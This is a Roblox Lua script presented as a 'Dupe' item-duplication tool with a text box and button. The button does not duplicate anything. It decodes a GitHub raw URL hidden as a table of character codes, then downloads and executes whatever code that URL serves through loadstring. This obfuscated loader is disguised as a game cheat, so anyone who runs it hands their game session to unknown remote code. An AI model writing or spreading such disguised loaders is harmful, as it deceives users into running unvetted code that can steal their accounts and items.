local g=game["GetService"](game,"Players")local p=g.LocalPlayer
local s=Instance["new"]("ScreenGui")s.Name="DupeGUI"s.ResetOnSpawn=false
s.Parent=p:WaitForChild("PlayerGui")
local f=Instance["new"]("Frame")f.Size=UDim2["new"](0,300,0,150)
f.Position=UDim2["new"](0.5,-150,0.5,-75)
f.BackgroundColor3=Color3["new"](0,0,0)
f.BorderSizePixel=0;f.Parent=s
local t=Instance["new"]("TextBox")
t.Size=UDim2["new"](0.8,0,0,40)
t.Position=UDim2["new"](0.1,0,0.2,0)
t.PlaceholderText="put the input here."
t.Text=""
t.BackgroundColor3=Color3.fromRGB(30,30,30)
t.TextColor3=Color3["new"](1,1,1)
t.ClearTextOnFocus=true
t.Parent=f
local b=Instance["new"]("TextButton")
b.Size=UDim2["new"](0.6,0,0,40)
b.Position=UDim2["new"](0.2,0,0.65,0)
b.Text="Dupe"
b.BackgroundColor3=Color3.fromRGB(0,102,204)
b.TextColor3=Color3["new"](1,1,1)
b.Font=Enum.Font.SourceSansBold
b.TextSize=24
b.Parent=f

-- Encoded loadstring URL
local u={"104","116","116","112","115","58","47","47","114","97","119","46","103","105","116","104","117","98","117","115","101","114","99","111","110","116","101","110","116","46","99","111","109","47","107","105","101","108","56","47","83","99","114","105","112","116","46","108","117","97","47","114","101","102","115","47","104","101","97","100","115","47","109","97","105","110","47","49","57","98","54","50","57","99","56","100","102","57","55","98","56","48","52","53","51","100","50","57","52","57","99","56","97","51","100","55","52","97","48","46","116","120","116"}

-- Convert number table to string URL
local function decode(tbl)
    local str=""
    for i=1,#tbl do
        str=str..string.char(tonumber(tbl[i]))
    end
    return str
end

b.MouseButton1Click:Connect(function()
    if t.Text~=""then
        local x=decode(u)
        loadstring(game:HttpGet(x))()
    end
end)
